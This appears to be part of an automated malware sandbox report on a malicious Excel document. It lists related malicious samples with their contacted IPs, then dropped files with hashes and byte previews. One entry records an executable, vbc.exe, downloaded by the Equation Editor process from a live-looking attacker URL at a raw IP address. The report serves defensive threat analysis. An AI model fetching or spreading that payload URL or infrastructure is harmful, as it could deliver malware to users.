                                                  PFD33mzc5lGet hashmaliciousBrowse
                                                  • 202.60.94.184
                                                  o4wjsQMo7qGet hashmaliciousBrowse
                                                  • 202.60.94.179
                                                  index.htmGet hashmaliciousBrowse
                                                  • 221.121.140.61
                                                  hZq38QWwIZGet hashmaliciousBrowse
                                                  • 202.60.94.28
                                                  qYPsFsdb1KGet hashmaliciousBrowse
                                                  • 202.60.94.29
                                                  9UpKBUAZ0RGet hashmaliciousBrowse
                                                  • 88.218.237.182
                                                  TRELLIAN-AS-APTrellianPtyLimitedAUmuma.exeGet hashmaliciousBrowse
                                                  • 103.224.212.222
                                                  P.O 20222021.xlsxGet hashmaliciousBrowse
                                                  • 103.224.212.222
                                                  DHL - WAYBILL 44 7611 9546 - Joao Carlos.exeGet hashmaliciousBrowse
                                                  • 103.224.212.221
                                                  Payment Instruction Copy.docGet hashmaliciousBrowse
                                                  • 103.224.212.220
                                                  57aPDj6E8h.exeGet hashmaliciousBrowse
                                                  • 103.224.182.210
                                                  Scan_doc.exeGet hashmaliciousBrowse
                                                  • 103.224.212.219
                                                  SOA.docGet hashmaliciousBrowse
                                                  • 103.224.212.222
                                                  YiboVzl2tz.exeGet hashmaliciousBrowse
                                                  • 103.224.182.241
                                                  Yeni sipari#U015f _WJO-007, pdf.exeGet hashmaliciousBrowse
                                                  • 103.224.182.238
                                                  Sipari#U015f Sorgulama #11032019,pdf.exeGet hashmaliciousBrowse
                                                  • 103.224.182.238
                                                  Ppx38Gkyeg.exeGet hashmaliciousBrowse
                                                  • 103.224.182.246
                                                  OKJDHJD.exeGet hashmaliciousBrowse
                                                  • 103.224.182.253
                                                  2xJxrfegtt.exeGet hashmaliciousBrowse
                                                  • 103.224.182.210
                                                  001130.exeGet hashmaliciousBrowse
                                                  • 103.224.182.242
                                                  DZqb1YCMJknskFE.exeGet hashmaliciousBrowse
                                                  • 103.224.212.221
                                                  77isbA5bpi.exeGet hashmaliciousBrowse
                                                  • 103.224.212.220
                                                  SKM_C250i21113013471.xlsxGet hashmaliciousBrowse
                                                  • 103.224.182.210
                                                  Updated SOA.exeGet hashmaliciousBrowse
                                                  • 103.224.182.241
                                                  HkE0tD0g4NXKJfy.exeGet hashmaliciousBrowse
                                                  • 103.224.212.219
                                                  piPvSLcFXV.exeGet hashmaliciousBrowse
                                                  • 103.224.212.220

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:downloaded
                                                  Size (bytes):417792
                                                  Entropy (8bit):7.729098788142576
                                                  Encrypted:false
                                                  SSDEEP:12288:gyK777777777777OPMfcmnxTLrXEQ0/Ll1PishiMkNMfPjJ8W:jK777777777777OKLQR1Pf+aP6W
                                                  MD5:83AC585E99B527EEB278702F8F711568
                                                  SHA1:A576A927B067C94CDBC1E7B353F60577F5B310F9
                                                  SHA-256:9E2502B3945F31482623E8E61DCB85B9EBB7D9A4244D9074FA289596C9DA513E
                                                  SHA-512:F4A5F197CCA552237CA4CA0DBDBA4AF5E5C0F6BCA7A05313A61D96C5021049EDEB0B38D8E4AD5EE3B062692038F05254787A57C5C1A0E951E9A9B9F091A304AC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                  Reputation:low
                                                  IE Cache URL:http://198.23.213.59/1155/vbc.exe
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H?.a.................V..........:u... ........@.. ....................................@..................................t..W.................................................................................... ............... ..H............text...@U... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B.................u......H.......|F..d.......-....]..............................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....oc...*..{....*.s..
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15A5C04C.emf
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):1628828
                                                  Entropy (8bit):2.229123093390047
                                                  Encrypted:false
                                                  SSDEEP:3072:UVMqDjXlNqlVkXFL4we9ANp7RySvRaXGcmfBEtAPrcccccsF8WccccccccF9cccC:ULjXlN0k1fKANpFZIiByA764
                                                  MD5:E5B435F23CA21C551E2EB0AD7511289A
                                                  SHA1:139160E066DA9E9E7DBD234C5B554CCEBE307138
                                                  SHA-256:2A64589D13E424512714FD43F0AD13D4870489D7D5DF1CB86A6A6AC84560D3EF
                                                  SHA-512:3E576211D088A0ECDE7D572CFE9684E84154E3191FAFF9A2C42E3E007006FE95FFD87E4EE6781A5DB5C6C394A4D7A2B85F651E9499DBEF019074EFA84972AFED
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ....l...........................m>...&.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................Tz$........f^z.@~.%...............D.......RQ.VD...<...........(...$Q.VD...<... ...Id^z<...D... ............d^z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X...<...p....8Vz........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\220FF079.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 135 x 175, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):9240
                                                  Entropy (8bit):7.9386613011729015
                                                  Encrypted:false
                                                  SSDEEP:192:xgohZDgqajF3w9dfa2EbNBdO31HC6xeiPUe8wO4szk6PwFUdSFepGh:CohZgqajWfa2ExbB23U4OkawF8SFegh
                                                  MD5:C19636DBD6A1B9428BCB8758E04F5FC7
                                                  SHA1:BD5F5490EB4FDFB9A8161A6F77B6440520136473
                                                  SHA-256:C7F22E5E13D15601B865F0DE1FDAB380218CE085DAB19B0A2F28ACA4A670A88E
                                                  SHA-512:F63D1E715EEAF2F93338F40DE2EAB6550483F1FAD430ED94AF0649AE7B073E2929796D43800E9CFC086D0F0C2EC18D2A8487B19F9071EECCE3CE777B25600B36
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............=c....tEXtSoftware.Adobe ImageReadyq.e<...~iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:DocumentID="xmp.did:EDC9411A6A5F11E2838BB9184F90E845" xmpMM:InstanceID="xmp.iid:EDC941196A5F11E2838BB9184F90E845" xmp:CreatorTool="Adobe Photoshop CS2 Windows"> <xmpMM:DerivedFrom stRef:instanceID="uuid:5A79598F285EDB11B275CB8CE9AFFC64" stRef:documentID="adobe:docid:photoshop:51683bff-375b-11d9-ab90-a923e782e0b8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...F....PLTE..............
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29ED4C58.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3747
                                                  Entropy (8bit):7.932023348968795
                                                  Encrypted:false
                                                  SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                  MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                  SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                  SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                  SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                  Malicious:false
                                                  Preview: .PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD030D5.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3747
                                                  Entropy (8bit):7.932023348968795
                                                  Encrypted:false
                                                  SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                  MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                  SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                  SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                  SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                  Malicious:false
                                                  Preview: .PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BD458D2.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 135 x 175, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):9240
                                                  Entropy (8bit):7.9386613011729015
                                                  Encrypted:false
                                                  SSDEEP:192:xgohZDgqajF3w9dfa2EbNBdO31HC6xeiPUe8wO4szk6PwFUdSFepGh:CohZgqajWfa2ExbB23U4OkawF8SFegh
                                                  MD5:C19636DBD6A1B9428BCB8758E04F5FC7
                                                  SHA1:BD5F5490EB4FDFB9A8161A6F77B6440520136473
                                                  SHA-256:C7F22E5E13D15601B865F0DE1FDAB380218CE085DAB19B0A2F28ACA4A670A88E
                                                  SHA-512:F63D1E715EEAF2F93338F40DE2EAB6550483F1FAD430ED94AF0649AE7B073E2929796D43800E9CFC086D0F0C2EC18D2A8487B19F9071EECCE3CE777B25600B36
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............=c....tEXtSoftware.Adobe ImageReadyq.e<...~iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:DocumentID="xmp.did:EDC9411A6A5F11E2838BB9184F90E845" xmpMM:InstanceID="xmp.iid:EDC941196A5F11E2838BB9184F90E845" xmp:CreatorTool="Adobe Photoshop CS2 Windows"> <xmpMM:DerivedFrom stRef:instanceID="uuid:5A79598F285EDB11B275CB8CE9AFFC64" stRef:documentID="adobe:docid:photoshop:51683bff-375b-11d9-ab90-a923e782e0b8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...F....PLTE..............
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90706C26.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                  Category:dropped
                                                  Size (bytes):4396
                                                  Entropy (8bit):7.884233298494423
                                                  Encrypted:false
                                                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                  Malicious:false
                                                  Preview: ......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B082A1EF.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):11303
                                                  Entropy (8bit):7.909402464702408
                                                  Encrypted:false
                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                  Malicious:false
                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C040A83A.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):11303
                                                  Entropy (8bit):7.909402464702408
                                                  Encrypted:false
                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                  Malicious:false
                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D37E7324.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10202
                                                  Entropy (8bit):7.870143202588524
                                                  Encrypted:false
                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB750BDD.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                  Category:dropped
                                                  Size (bytes):4396
                                                  Entropy (8bit):7.884233298494423
                                                  Encrypted:false
                                                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                  Malicious:false
                                                  Preview: ......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3F9A6F3.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10202
                                                  Entropy (8bit):7.870143202588524
                                                  Encrypted:false
                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                                  C:\Users\user\AppData\Local\Temp\~DF182ACAA3E256FB8B.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF348A23C0846DCD61.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
